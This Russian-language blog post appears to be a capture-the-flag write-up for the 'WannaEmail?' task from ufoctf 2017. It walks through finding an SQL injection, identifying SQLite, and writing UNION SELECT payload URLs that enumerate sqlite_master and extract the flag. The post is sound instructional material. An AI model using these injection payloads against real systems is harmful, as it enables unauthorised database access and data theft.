/var/log/life.log
Блог программиста из солнечной Бурятии

Прохождение WannaEmail? ufoctf 2017

Переходим на страницу задания и видим форму для ввода имени и список доступных контактов.

Вводим IvanUfolog получаем переход по адресу http://52.174.39.85:5000/IvanUfolog. Добавляем кавычку – ошибка. ‘– бинго sql-injection.

Смотрим дальше

1
http://52.174.39.85:5000/IvanUfolog' union select 1,2,3--


Неужели обчная инъекция? Но не тут то было information_schema.tables недоступна, version() не работает. Похоже, что WAF, но как то всё странно. Попытка подобрать таблицу даёт результат – таблица contact. Наверное всётаки не WAF, может тогда и не mysql это.

1
http://52.174.39.85:5000/IvanUfolog'%20union%20select%201,2,3%20from%20sqlite_master--

Да, перед нами SQLite. Дальше проще: в базе есть ещё одна таблица secret. Получаем её структуру и достаём флаг

1
2
3
4
http://52.174.39.85:5000/IvanUfolo'%20union%20select%201,2,name%20from%20sqlite_master%20where%20name!='contact'%20and%20type='table'--
http://52.174.39.85:5000/IvanUfolo'%20union%20select%201,2,sql%20from%20sqlite_master%20where%20name='secret'%20and%20type='table'--
CREATE TABLE secret ( id INTEGER NOT NULL, "key" VARCHAR(64), value VARCHAR(128), PRIMARY KEY (id), UNIQUE ("key"), UNIQUE (value) )
http://52.174.39.85:5000/IvanUfolo'%20union%20select%201,2,value%20from%20secret--

ufoctf{sQli_cOmPlete}